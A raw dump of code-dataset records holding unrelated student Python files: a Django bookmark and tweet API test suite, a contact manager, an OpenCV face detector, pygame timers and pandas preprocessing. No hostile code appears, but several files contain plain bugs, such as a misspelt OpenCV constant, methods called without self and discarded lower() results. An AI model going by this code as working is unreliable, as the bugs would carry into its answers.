match[\"home_team_name\"].split(' ')[0]\n show_away_name = match[\"away_team_name\"].split(' ')[0]\n result_list.append([\n f'{show_home_name} -- {show_away_name}',\n score_comment\n ])\n return result_list\n","sub_path":"back/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":9488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"279574911","text":"class Member:\n \n def __init__(self, name, score, hole, add_score=0, center_skill=''):\n self.name = name\n self.score = score\n self.added = score\n self.hole = hole\n self.center_skill = center_skill\n self.add_score = add_score\n self.team = self.get_team()\n self.grade = self.get_grade()\n self.unit = self.get_unit()\n \n def __str__(self):\n return self.name + '_' + str(self.score)\n \n def __del__(self):\n pass\n #print('delete ' + self.__str__())\n \n def __dict__(self):\n return {}\n \n def get_team(self):\n name = self.name.split('_')[1].lower()\n if name in ('maki', 'rin', 'hanayo', 'honoka', 'kotori', 'umi', 'nico', 'eli', 'nozomi'):\n return \"µ's\"\n elif name in ('ruby', 'hanamaru', 'yoshiko', 'chika', 'you', 'riko', 'kanan', 'dia', 'mari'):\n return 'Aqours'\n else: raise Exception('member name error')\n\n def get_grade(self):\n name = self.name.split('_')[1].lower()\n if name in ('maki', 'rin', 'hanayo', 'ruby', 'hanamaru', 'yoshiko'):\n return 1\n elif name in ('honoka', 'kotori', 'umi', 'chika', 'you', 'riko'):\n return 2\n elif name in ('nico', 'eli', 'nozomi', 'kanan', 'dia', 'mari'):\n return 3\n else: raise Exception('member name error')\n\n def get_unit(self):\n name = self.name.split('_')[1].lower()\n if name in ('honoka', 'kotori', 'hanayo'):\n return 'Printemps'\n elif name in ('nico', 'eli', 'maki'):\n return 'BiBi'\n elif name in ('umi', 'rin', 'nozomi'):\n return 'lily while'\n elif name in ('chika', 'you', 'ruby'):\n return 'CYaRon!'\n elif name in ('kanan', 'dia', 'hanamaru'):\n return 'AZALEA'\n elif name in ('riko', 'yoshiko', 'mari'):\n return 'Guilty Kiss'\n else: raise Exception('member name error')","sub_path":"Member.py","file_name":"Member.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"599966776","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jul 22 15:51:29 2018\n\n@author: qgqg2\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 21 00:26:44 2018\n\n@author: gjrm2\n\"\"\"\n\nimport pandas as pd\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport collections\n\n# utf-8 encoding error, so I take 'cp1252'\ndf = pd.read_csv('laptops.csv', encoding= \"cp1252\")\ndf.shape\ndf = df.drop('Unnamed: 0',1)\n#쓸데없는 컬럼 버리기!!\n\ndf['Cpu_modified'] = df.Cpu.apply(lambda e: e.split()[2])\ndf['Cpu_Clock'] = df.Cpu.apply(lambda e: e.split()[-1])\ndf['Cpu_Clock'] = df.Cpu_Clock.apply(lambda x: x[0: -3])\ndf['Cpu_Clock'] = df['Cpu_Clock'].apply(pd.to_numeric)\ndf.loc[(df[\"Cpu_modified\"] != 'i3') & (df[\"Cpu_modified\"] != 'i5') & (df[\"Cpu_modified\"] != 'i7'), \"Cpu_modified\"] = -1\ndf.loc[df[\"Cpu_modified\"] == 'i3', \"Cpu_modified\"] =3 + df[\"Cpu_Clock\"]/4\ndf.loc[df[\"Cpu_modified\"] == 'i5', \"Cpu_modified\"] =5 + df[\"Cpu_Clock\"]/4\ndf.loc[df[\"Cpu_modified\"] == 'i7', \"Cpu_modified\"] =7 + df[\"Cpu_Clock\"]/4\ndf['Cpu_modified'] = df['Cpu_modified'].apply(pd.to_numeric)\n#Cpu부분 modify해서 우선순위 매기기(수치화?)\n\ndf['Ram_modified'] = df.Ram.apply(lambda x: x[0:-2])\ndf['Ram_modified'] = df['Ram_modified'].apply(pd.to_numeric, errors = 'coerce')\n#Ram부분 우선순위 매기기\n\ndf['weight_modified'] = df.Weight.apply(lambda x: x[0:-2])\ndf['weight_modified'] = df['weight_modified'].apply(pd.to_numeric)\n#Weight 부분 우선순위 매기기\ndf['Screen_modified'] = df.ScreenResolution.apply(lambda e: e.split()[-1])\ndf['Screen_modified'] = df.Screen_modified.apply(lambda x: x[0:4])\ndf['Screen_modified'] = df['Screen_modified'].apply(pd.to_numeric)\ndf[\"Screen_modified\"] = df[\"Screen_modified\"]/100\n#해상도 부분 우선순위 매기기\n\ndf['Memory_temp'] = df.Memory.apply(lambda e: e.split()[1])\ndf['Memory_SSD'] = df['Memory_temp']\ndf['Memory_SSD'].fillna(0)\ndf.loc[df['Memory_temp'] == 'SSD' ,\"Memory_SSD\"] = df['Memory'].apply(lambda e: e.split()[0])\ndf.loc[df['Memory_temp'] != 'SSD', \"Memory_SSD\"] = '-1GB'\ndf['Memory_SSD'] = df.Memory_SSD.apply(lambda x :x[0:-2])\ndf.loc[df['Memory_SSD'] == '1' ,\"Memory_SSD\"] = '1024'\ndf['Memory_SSD'] = df['Memory_SSD'].apply(pd.to_numeric)\n\ndf['Memory_HDD'] = df['Memory_temp']\ndf['Memory_HDD'].fillna(0)\ndf.loc[df['Memory_temp'] == 'HDD' ,\"Memory_HDD\"] = df['Memory'].apply(lambda e: e.split()[0])\ndf.loc[df['Memory_temp'] != 'HDD', \"Memory_HDD\"] = '-1GB'\ndf['Memory_HDD'] = df.Memory_HDD.apply(lambda x :x[0:-2])\ndf.loc[df['Memory_HDD'] == '1' ,\"Memory_HDD\"] = '1024'\ndf['Memory_SSD'] = df['Memory_SSD'].apply(pd.to_numeric)\n#메모리 전처리\n\nCorr = df.corr()\n\n#csv파일 읽어오기","sub_path":"[0722_현수]Naver_DSC2018/Preprocessing.py","file_name":"Preprocessing.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"467137165","text":"'''\r\nCreated on Feb 10, 2014\r\n\r\n@author: Yongha\r\n'''\r\nimport re\r\ndef main():\r\n rrnPattern = re.compile('(^|\\D)\\d{7}($|\\D)')\r\n myString= '0123456'\r\n mym = rrnPattern.match(myString)\r\n if mym:\r\n print(mym.group(0))\r\n else:\r\n print(\"no match\")\r\n \r\nif __name__ == '__main__':\r\n main()","sub_path":"WD_Nesting/src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"386932270","text":"from django.test import TestCase\nfrom bookmarks.models import Bookmark, BookmarkTag\n\n\nclass BookMarkModelTest(TestCase):\n\n def test_saving_and_retrieving_bookmark(self):\n first_bookmark = Bookmark()\n first_bookmark.name = \"google\"\n first_bookmark.url = \"https://www.google.com\"\n first_bookmark.save()\n\n second_bookmark = Bookmark()\n second_bookmark.name = \"facebook\"\n second_bookmark.url = \"https://www.facebook.com\"\n second_bookmark.save()\n\n saved_bookmarks = Bookmark.objects.all()\n self.assertEqual(saved_bookmarks.count(), 2)\n first_saved_bookmark = saved_bookmarks[0]\n second_saved_bookmark = saved_bookmarks[1]\n self.assertEqual(first_saved_bookmark.name, \"google\")\n self.assertEqual(second_saved_bookmark.name, \"facebook\")\n","sub_path":"everbookmarks/bookmarks/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"604793359","text":"# Team 1: Jonathan Kaufmann, Urjii Tahir, Mark Fasano\n# Csc 280\n# 11/30/2016\n# Final Project\n\nfrom datetime import datetime\nimport pickle\n\nclass Contact():\n '''contacts object'''\n def __init__(self, name, group, phone = '', address = '', fax = '', email = '', company = '', position = '', note = ''):\n '''initializes contact object'''\n # team contribution\n self.name = name\n self.group = group\n self.phone = phone\n self.address = address\n self.fax = fax\n self.email = email\n self.corp = company\n self.position = position\n self.note = note\n\n def helper(self):\n '''help functionality for user'''\n print(\"Enter e to edit contact info\")\n print(\"Enter se to send an email to contact\")\n print(\"Enter st to send text message to contact\")\n print(\"Enter d to display contact info\")\n print(\"Enter x to exit\")\n\n\n def changer(self, ui, same):\n '''ui for editing item'''\n # team contribution\n ui.lower()\n # offer to change if y\n if ui == 'y':\n ui1 = input(\"Input the new item: \")\n return ui1\n # keep same otherwise\n else:\n return same\n\n\n def editContact(self):\n '''edits a contact'''\n ui1 = input(\"Would you like to change the name? (y/n): \")\n self.name = changer(ui1, self.name)\n #group input\n ui = input(\"Input 1 for friend, 2 for family, 3 for professional: \")\n if ui == 1:\n self.group = friend\n elif ui == 2:\n self.group = family\n elif ui == 3:\n self.group = professional\n # phone number input\n ui1 = input(\"Would you like to change the phone number? (y/n): \")\n self.phone = changer(ui1, self.phone)\n #address input\n ui1 = input(\"Would you like to change the address? (y/n): \")\n self.address = changer(ui1, self.address)\n #fax input\n ui1 = input(\"Would you like to change the fax? (y/n): \")\n self.fax = changer(ui1, self.fax)\n #email input\n ui1 = input(\"Would you like to change the email? (y/n): \")\n self.email = changer(ui1, self.email)\n #company input\n ui1 = input(\"Would you like to change the company? (y/n): \")\n self.corp = changer(ui1, self.corp)\n # position input\n ui1 = input(\"Would you like to change the company position? (y/n): \")\n self.position = changer(ui1, self.position)\n #note input\n ui1 = input(\"Would you like to change the note? (y/n): \")\n self.note = changer(ui1, self.note)\n\n\n\n def sendEmail(self):\n '''formats email for sending'''\n #get input\n sub = input(\"Input email subject: \")\n email = input(\"Input email text: \")\n rec = self.email\n # print to user\n print(\"Recipient: \" + rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + email)\n # export to mailer software\n return(rec, sub, email)\n \n\n\n def sendMessage(self):\n '''formats text for sending'''\n #get input\n rec = self.phone\n text = input(\"Input text: \")\n #print to user\n print(\"Recipient: \" + rec)\n print(\"Text: \" + text)\n # export to mailer software\n return (rec, text)\n \n\n\n def display(self):\n '''displays contact info'''\n print(\"Name: \" + self.name)\n print(\"Relation: \" + self.group)\n print(\"Phone: \" + self.phone)\n print(\"Email: \" + self.email)\n print(\"Company: \" + self.corp)\n print(\"Position: \" + self.position)\n print(\"Address: \" + self.address)\n print(\"Fax: \" + self.fax)\n print(\"Personal Note: \" + self.note)\n\n \nclass Company():\n '''creates company info and directory for employees'''\n def __init__(self, name, industry, phone, email, address, fax):\n '''initializes attributes'''\n # team contribution\n self.name = name\n self.ind = industry\n self.phone = phone\n self.email = email\n self.address = address\n self.fax = fax\n self.emps = {}\n\n def edit(self):\n '''edits company'''\n # name input\n ui1 = input(\"Would you like to change the name? (y/n): \")\n self.name = changer(ui1, self.name)\n self.merger()\n # industry input\n ui1 = input(\"Would you like to change the industry? (y/n): \")\n self.ind = changer(ui1, self.ind)\n # phone number input\n ui1 = input(\"Would you like to change the phone number? (y/n): \")\n self.phone = changer(ui1, self.phone)\n #address input\n ui1 = input(\"Would you like to change the address? (y/n): \")\n self.address = changer(ui1, self.address)\n #fax input\n ui1 = input(\"Would you like to change the fax? (y/n): \")\n self.fax = changer(ui1, self.fax)\n #email input\n ui1 = input(\"Would you like to change the email? (y/n): \")\n self.email = changer(ui1, self.email)\n \n\n \n def changer(self, ui, same):\n '''ui for editing item'''\n # team contribution\n ui.lower()\n # offer to change if y\n if ui == 'y':\n ui1 = input(\"Input the new item: \")\n return ui1\n # keep same otherwise\n else:\n return same\n\n def add(self, contact):\n '''adds contact'''\n self.emps[contact.name] = contact\n contact.corp = self.name\n\n\n def sendEmail(self):\n '''formats email for sending'''\n #get input\n sub = input(\"Input email subject: \")\n email = input(\"Input email text: \")\n rec = self.email\n # print to user\n print(\"Recipient: \" + rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + email)\n # export to mailer software\n return(rec, sub, email)\n\n\n def sendAll(self):\n '''formats email to all employees'''\n #get input\n sub = input(\"Input email subject: \")\n email = input(\"Input email text: \")\n rec = []\n for emp in self.emps:\n rec.append(self.emps[emp].email)\n # print to user\n print(\"Recipient: \" + rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + email)\n # export to mailer software\n return(rec, sub, email)\n\n def fire(self, contact):\n '''removes employee from company list'''\n del self.emps[contact.name]\n contact.corp = ''\n\n\n def fireAll(self):\n '''removes all employees from list'''\n for emp in self.emps:\n emp.corp = ''\n self.emps = {}\n\n def directory(self):\n '''displays directory'''\n print(self.name + \" Directory of Employees:\")\n for emp in self.emps:\n print(\"Name: \" + self.emps[emp].name + ' Position: ' + self.emps[emp].position)\n\n def display(self):\n '''displays company info'''\n print(\"Name: \" + self.name)\n print(\"Industry: \" + self.ind)\n print(\"Phone: \" + self.phone)\n print(\"Email: \" + self.email)\n print(\"Address: \" + self.address)\n print(\"Fax: \" + self.fax)\n\n def merger(self):\n '''changes emps company name if name changes'''\n for emp in self.emps:\n self.emps[emp].corp = self.name\n\n def helper(self):\n '''help functionality for user'''\n print(\"Enter e to edit company info\")\n print(\"Enter se to send email to company\")\n print(\"Enter sa to send email to all employees\")\n print(\"Enter d to display company information\")\n print(\"Enter dir to display company directory\")\n print(\"Enter x to exit\")\n\n\n\nclass Manage():\n '''management system for contacts'''\n def __init__(self, contacts = {}, corps = {}, friends = {}, family = {}, profs ={}):\n '''initializes with lists of contacts, contacts by group, list of companies'''\n # team contribution\n self.contacts = contacts\n self.corps = corps\n self.friends = friends\n self.family = family\n self.profs = profs\n self.count = self.counter()\n if self.count == None:\n self.count = 0\n\n\n def addContact(self):\n '''adds new contact'''\n # team contribution\n # must input name, group\n # optional input number email address fax company position personal note\n #name input\n name = input(\"Name: \")\n #group input\n ui = int(input(\"Input 1 for friend, 2 for family, 3 for professional: \"))\n if ui == 1:\n group = 'friend'\n elif ui == 2:\n group = 'family'\n elif ui == 3:\n group = 'professional'\n # phone number input\n ui1 = input(\"Would you like to input a phone number? (y/n): \")\n if ui1 == 'y':\n phone = input(\"Phone number: \")\n else:\n phone = ''\n #address input\n ui2 = input(\"Would you like to input an address? (y/n): \")\n if ui2 == 'y':\n address = input(\"Address: \")\n else:\n address = ''\n #fax input\n ui3 = input(\"Would you like to input a fax? (y/n): \")\n if ui3 == 'y':\n fax = input(\"Fax: \")\n else:\n fax = ''\n #email input\n ui4 = input(\"Would you like to input an email? (y/n): \")\n if ui4 == 'y':\n email = input(\"Email: \")\n else:\n email = ''\n #company input\n ui5 = input(\"Would you like to input a company? (y/n): \")\n if ui5 == 'y':\n company = input(\"Company: \")\n ui52 = input(\"Would you like to input their position in the company? (y/n): \")\n if ui52 == 'y':\n position = input(\"Position: \")\n else:\n position = ''\n else:\n company = ''\n position = ''\n #note input\n ui6 = input(\"Would you like to input a personal note? (y/n): \")\n if ui6 == 'y':\n note = input(\"Note: \")\n else:\n note = ''\n #create and add to lists\n new_contact = Contact(name, group, phone, address, fax, email, company, position, note)\n self.contacts[new_contact.name] = new_contact\n # add to group list\n if group == \"friend\":\n self.friends[new_contact.name] = new_contact\n elif group == \"family\":\n self.family[new_contact.name] = new_contact\n else:\n self.profs[new_contact.name] = new_contact\n # add to company\n if company in self.corps.keys():\n self.corps[company].add(new_contact)\n self.count += 1\n\n\n def addCorp(self):\n '''adds new company'''\n name = input(\"Company Name: \")\n ind = input(\"Industry: \")\n # phone number input\n ui1 = input(\"Would you like to input a phone number? (y/n): \")\n if ui1 == 'y':\n phone = input(\"Phone number: \")\n else:\n phone = ''\n #address input\n ui2 = input(\"Would you like to input an address? (y/n): \")\n if ui2 == 'y':\n address = input(\"Address: \")\n else:\n address = ''\n #fax input\n ui3 = input(\"Would you like to input a fax? (y/n): \")\n if ui3 == 'y':\n fax = input(\"Fax: \")\n else:\n fax = ''\n #email input\n ui4 = input(\"Would you like to input an email? (y/n): \")\n if ui4 == 'y':\n email = input(\"Email: \")\n else:\n email = ''\n # add new\n new_corp = Company(name, ind, phone, email, address, fax)\n self.corps[name] = new_corp\n # add employees\n for con in self.contacts:\n if self.contacts[con].corp == name:\n new_corp.add(self.contacts[con])\n \n \n\n def delCorp(self):\n '''deletes corp'''\n name = input(\"Input name of corporation to delete: \")\n com = self.corps[name]\n com.fireAll()\n del self.corps[name]\n\n\n def delContact(self):\n '''deletes contact'''\n name = input(\"Input name of contact to delete: \")\n corp = self.contacts[name].corp\n # delete contact\n del self.contacts[name]\n # delete from ancillary lists\n if name in self.friends.keys():\n del self.friends[name]\n elif name in self.family.keys():\n del self.family[name]\n elif name in self.profs.keys():\n del self.profs[name]\n if corp in self.corps.keys():\n del self.corps[corp].emps[name]\n self.count -= 1\n\n def clearContacts(self):\n '''clears system'''\n self.contacts = {}\n self.corps = {}\n self.friends = {}\n self.family = {}\n self.profs = {}\n self.count = 0\n\n def group_selector(self):\n '''chooses group'''\n print(\"Which group would you like to select?\")\n ui = input(\"Input 1 for friend, 2 for family, 3 for professional: \")\n return ui\n\n def displayGroup(self):\n '''goes through group'''\n ui = self.group_selector()\n #friends\n if ui == 1:\n print(\"Friend Contacts:\")\n for friend in self.friends:\n print(self.friends[friend].name)\n #family\n if ui == 2:\n print(\"Family Contacts:\")\n for fam in self.family:\n print(self.family[fam].name)\n #professional contacts\n if ui == 3:\n print(\"Professional Contacts\")\n for prof in self.profs:\n print(self.profs[prof].name)\n\n def searchName(self):\n '''searches contact by name'''\n name = input(\"Input company name to search: \")\n person = self.contacts[name]\n self.conControl(person)\n\n def searchCorp(self):\n '''searches company by company name'''\n name = input(\"Input company name to search: \")\n corp = self.corps[name]\n self.corpControl(corp)\n\n \n def sendGroup(self):\n '''send mass email to group'''\n ui = self.group_selector()\n rec = \"To: \"\n rec_list = []\n #friends\n if ui == 1:\n for friend in self.friends:\n rec += friend.email + \", \"\n rec_list += friend.email\n #family\n if ui == 2:\n for fam in self.family:\n rec += fam.email + \", \"\n rec_list += fam.email\n #professional contacts\n if ui == 3:\n for prof in self.profs:\n rec += prof.email + \", \"\n rec_list += prof.email\n # get input\n sub = input(\"Subject: \")\n text = input(\"Body: \")\n # print\n print(rec)\n print(\"Subject: \" + sub)\n print(\"Body: \" + text)\n # export to mailer\n return (rec_list, sub, text)\n \n def count(self):\n '''counts contacts'''\n return self.count\n\n def counter(self):\n '''initializes count'''\n self.count = len(self.contacts)\n\n def saver(self):\n '''creates dict for pickling'''\n save = {\"cons\": self.contacts, \"corps\" : self.corps, \"friends\" : self.friends,\n \"fam\" : self.family, \"profs\" : self.profs}\n return save\n\n def corpControl(self, corp):\n '''control module for corporations'''\n print(\"Corporation: \" + corp.name)\n print(\"Enter h for help\")\n while True:\n ui = input(\"Input command: \")\n ui.lower()\n # exit\n if ui == 'x':\n return None\n # help\n elif ui == 'h':\n corp.helper()\n # edit\n elif ui == 'e':\n corp.edit()\n # send email\n elif ui == 'se':\n corp.sendEmail()\n # send email to email\n elif ui == 'sa':\n corp.sendAll()\n # display directory\n elif ui == 'dir':\n corp.directory()\n # display info\n elif ui == 'd':\n corp.display()\n # dumb user\n else:\n print(\"Improper command, type h for help\")\n\n \n\n def conControl(self, con):\n '''control module for contacts'''\n print(\"Name: \" + con.name)\n print(\"Enter for h help\")\n while True:\n ui = input(\"Input command: \")\n ui.lower()\n # exit\n if ui == 'x':\n return None\n # helper\n elif ui == 'h':\n con.helper()\n # edit\n elif ui == 'e':\n con.editContact()\n # send email\n elif ui == 'se':\n con.sendEmail()\n # send text\n elif ui == 'st':\n con.sendMessage()\n # display contact info\n elif ui == 'd':\n con.display()\n # dumb user\n else:\n print(\"Improper command, type h for help\")\n\ndef helper():\n \"\"\"help functionality\"\"\"\n print(\"Type a to add a contact or corporation\")\n print(\"Type d to delete a contact or corporation\")\n print(\"Type dis to display contact names in a group\")\n print(\"Type s to seach contacts or corporations and modify them\")\n print(\"Type e to send an email to a group\")\n print(\"Type c to show how many contacts you have\")\n print(\"Type save to save for later\")\n print(\"Type l to load a contact list\")\n print(\"Type x to exit\")\n\ndef save(man):\n \"\"\"saves contact system for later\"\"\"\n pickle.dump( man, open( \"save.p\", \"wb\" ) )\n\ndef load():\n \"\"\"loads contact system\"\"\"\n return pickle.load( open( \"save.p\", \"rb\" ) )\n \n\ndef main():\n \"\"\"main functionality control\"\"\"\n # initialize load checker\n save_ui = input(\"Do you have a previous contact list to load? (y/n): \")\n save_ui.lower()\n if save_ui == 'y':\n man = load()\n else:\n man = Manage()\n print(\"initializing...\")\n print(\"Welcome to Contact Manager for Ford Enterprises\")\n print(\"Input command or type h for help\")\n #loop\n while True:\n ui = input(\"Input command: \")\n ui.lower()\n # exit\n if ui == 'x':\n return None\n # help\n elif ui == 'h':\n helper()\n # send email to whole group\n elif ui == 'e':\n man.sendGroup()\n # saves\n elif ui == 'save':\n man.saver()\n save(man)\n # add contact or corporation\n elif ui == 'a':\n ui1 = input(\"Input 1 to add contact or 2 to add corporation: \")\n if ui1 == '1':\n man.addContact()\n if ui1 == '2':\n man.addCorp()\n # delete contact or corporation\n elif ui == 'd':\n ui1 = input(\"Input 1 to delete contact or 2 to delete corporation: \")\n if ui1 == '1':\n man.delContact()\n if ui1 == '2':\n man.delCorp()\n # display group names\n elif ui == 'dis':\n man.displayGroup()\n # search contact or corps by names\n elif ui == 's':\n ui1 = input(\"Input 1 to search contact or 2 to search corporation: \")\n if ui1 == '1':\n man.searchName()\n if ui1 == '2':\n man.searchCorp()\n # shows count of contacts\n elif ui == 'c':\n count = str(man.count())\n print(\"You have: \" + count+ \" contacts.\")\n # load management system\n elif ui == 'l':\n man = load()\n # dumb user\n else:\n print(\"Incorrect command, enter h for help.\")\n\nif __name__ == '__main__':\n \"\"\"initialize the thingy\"\"\"\n main()\n \n\n \n\n\n","sub_path":"9841_Final.py","file_name":"9841_Final.py","file_ext":"py","file_size_in_byte":19924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"135825227","text":"#haarcascade-eye.xml --> göz tanıma\n#haarcascade-frontalface-default.xml --> yüz tanıma\n#videoda ses olmaması gerekiyor\n\nimport cv2\nimport imageio\n\nface_cascade = cv2.CascadeClassifier(\"haarcascade-frontalface-default.xml\")\neye_cascade = cv2.CascadeClassifier(\"haarcascade-eye.xml\")\n#filtre serisini tanımladık\n\ndef detect(frame):\n gray = cv2.cvtColor(frame,cv2.qCOLOR_BGR2GRAY)\n faces = face_cascade.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5)\n for (x,y,w,h) in faces:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)\n gray_face = gray[y:y+h,x:x+w]\n color_face = frame[y:y+h,x:x+w]\n eyes = eye_cascade.detectMultiScale(gray_face,1.1,3)\n for (ex,ey,ew,eh) in eyes:\n cv2.rectangle(color_face,(ex,ey),(ex+ew,ey+eh),(0,255,0),2)\n return frame\n\nvideo_capture = cv2.VideoCapture(0)\nwhile True:\n _,frame = video_capture.read()\n canvas = detect(frame)\n cv2.imshow('Video',canvas)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n","sub_path":"face_det_webcam.py","file_name":"face_det_webcam.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"18357049","text":"from itertools import cycle\nfrom pygame.time import Clock, get_ticks\nfrom random import uniform\n\n\n__all__ = ('EventTriggerConstant', 'EventTriggerCountDown', 'EventTrigger',\n 'MsHoldTrigger', 'MsCountdownTrigger', 'MsDelayTrigger')\n\n\n# Note: Switch the delta timer to consumer based delta timer\n# Needs total rework on the game logic\nclass DeltaTimer(object):\n\n __dt_clock = Clock()\n __dt_ticks = get_ticks\n\n dt_deltas = {'delta_ms': 0,\n 'ticks': 0}\n\n @classmethod\n def dt_tick(cls, limit_fps=0, ignore_delta=0):\n dt = cls.__dt_clock.tick(limit_fps) / 1000.0\n ticks = cls.__dt_ticks() \n if not ignore_delta:\n cls.dt_deltas['delta_ms'] = min(0.025, dt) # Lock delta from going below delta of 40fps\n cls.dt_deltas['ticks'] = ticks\n\n return 0\n\n @classmethod\n def dt_fps(cls): return cls.__dt_clock.get_fps()\n\n @classmethod\n def dt_getDelta(cls): return cls.dt_deltas['delta_ms']\n\n @classmethod\n def dt_getTicks(cls): return cls.dt_deltas['ticks'] \n\n\n\nclass MsCountdownTrigger(DeltaTimer):\n __slots__ = 'ms'\n\n def __init__(self, ms, ret_type=0):\n self.ms = ms \n self.ret_type = ret_type # What to do when timer reaches 0\n\n def isDone(self):\n if self.ms <= 0:\n if self.ret_type: return 0\n else: raise StopIteration\n \n self.ms -= self.dt_deltas['delta_ms']\n return 1\n\n\n\nclass MsDelayTrigger(DeltaTimer):\n __slots__ = 'dms', 'ms'\n\n def __init__(self, delay_ms):\n self.dms = delay_ms # Default timer value\n self.ms = delay_ms # Active timer\n\n def isReady(self):\n if self.ms <= 0: \n self.ms = self.dms\n return 1\n \n self.ms -= self.dt_deltas['delta_ms']\n return 0\n\n\n\nclass MsHoldTrigger(DeltaTimer):\n\n __dt_uniform = uniform\n\n def __init__(self, delay_ms, state=1, random_time=False):\n # Default timer value\n self.dms = delay_ms \n \n # Active timer\n self.ms = self.__dt_uniform(0, delay_ms) if random_time else delay_ms\n \n # Bool state for the timer\n self.ready = state \n\n # Default state for the timer\n self.dstate = state \n\n\n def isReady(self, release=0):\n if release and self.ready:\n state = self.ready\n self.ready = 0\n return state\n\n if self.ready: return 0\n\n self.ms -= self.dt_deltas['delta_ms']\n if self.ms <= 0: \n self.ready = 1\n self.ms = self.dms \n\n def reset(self):\n self.ms = self.dms; self.ready = self.dstate\n\n\n\n\n# --------------------------------\n\n\nclass EventTriggerConstant(object):\n\n __slots__ = ('delay', 'default', 'ready', 'timer')\n\n def __init__(self, delay, state=1):\n self.delay = delay \n \n self.default = state\n self.ready = state\n \n self.timer = 0\n\n \n def isReady(self, increment=1, release=0):\n \"\"\"\n Tick the timer everytime this function is call'd\n and when the timer is greater or equal to delay, set ready True\n\n increment -> Timer increment (default: once every frame) \n release -> if 'True' release the internal state\n\n return -> bool\n\n \"\"\"\n if release and self.ready:\n state = self.ready\n self.ready = 0 \n return state\n \n if self.ready: return 0\n \n self.timer += increment\n if self.timer >= self.delay:\n self.ready = 1; self.timer = 0\n\n def reset(self): self.timer = 0; self.ready = self.default\n\n\n# --------------------------------\n\n\nclass EventTriggerCountDown(object):\n \"\"\"\n Creates a countdown trigger which creates an StopIteration exception when generator has exhausted\n \"\"\"\n\n __slots__ = ('countdown')\n\n def __init__(self, countDown):\n # Technically doesn't 'countdown' \n self.countdown = iter(xrange(countDown))\n\n def isDone(self):\n \"\"\"\n This function should be call'd inside try/except block to catch the StopIteration exception\n\n return -> None\n\n \"\"\"\n # Keep .nexting till StopIteration is raised\n self.countdown.next()\n\n\n# --------------------------------\n\n\nclass EventTrigger(object):\n \"\"\"\n Creates an timer generator which pulses True when delay (Scene count) has been reached\n and start from the beginning\n\n \"\"\"\n \n tk_cycle = cycle\n\n __slots__ = ('timer')\n\n def __init__(self, delay):\n self.timer = self.tk_cycle(self.cGenerator(delay))\n \n \n @classmethod\n def cGenerator(cls, delay):\n \"\"\"\n Creates an generator with the first value 1 and 0 for the rest of the delay\n\n return -> Generator (bool)\n \n \"\"\"\n yield 1\n for _ in xrange(delay - 1): yield 0 \n \n\n def getReady(self):\n \"\"\"\n Return the bool state from the generator\n pulsing 'True' between the delays\n\n return -> bool\n\n \"\"\"\n return self.timer.next()\n ","sub_path":"Timer.py","file_name":"Timer.py","file_ext":"py","file_size_in_byte":5204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"88375226","text":"from rest_framework.test import APIClient\nfrom testing.testcases import TestCase\nfrom tweets.models import Tweet\n\nTWEET_CREATE_API = '/api/tweets/'\nTWEET_LIST_API = '/api/tweets/'\n\nclass TweetApiTests(TestCase):\n\n def setUp(self):\n self.anonymous_client = APIClient()\n\n self.user1 = self.create_user('user1', 'user1@jiuzhang.com')\n self.tweets1 = [\n self.create_tweet(self.user1)\n for i in range(3)\n ]\n self.user1_client = APIClient()\n self.user1_client.force_authenticate(self.user1)\n\n self.user2 = self.create_user('user2', 'user2@jiuzhang.com')\n self.tweets2 = [\n self.create_tweet(self.user2)\n for i in range(2)\n ]\n\n def test_list_api(self):\n response = self.anonymous_client.get(TWEET_LIST_API)\n self.assertEqual(response.status_code, 400)\n\n response = self.anonymous_client.get(TWEET_LIST_API, {'user_id': self.user1.id})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.data['Tweets']), 3)\n response = self.anonymous_client.get(TWEET_LIST_API, {'user_id': self.user2.id})\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.data['Tweets']), 2)\n self.assertEqual(response.data['Tweets'][0]['id'], self.tweets2[1].id)\n self.assertEqual(response.data['Tweets'][1]['id'], self.tweets2[0].id)\n\n def test_create_api(self):\n # must log in\n response = self.anonymous_client.post(TWEET_CREATE_API)\n self.assertEqual(response.status_code, 403)\n\n # must with content\n response = self.user1_client.post(TWEET_CREATE_API)\n self.assertEqual(response.status_code, 400)\n # content too short\n response = self.user1_client.post(TWEET_CREATE_API, {'content': '1'})\n self.assertEqual(response.status_code, 400)\n # content too long\n response = self.user1_client.post(TWEET_CREATE_API, {'content': '1' * 141})\n self.assertEqual(response.status_code, 400)\n\n tweets_count = Tweet.objects.count()\n response = self.user1_client.post(TWEET_CREATE_API, {\n 'content': 'hangbao is the best'\n })\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.data['user'], self.user1.id)\n self.assertEqual(Tweet.objects.count(), tweets_count + 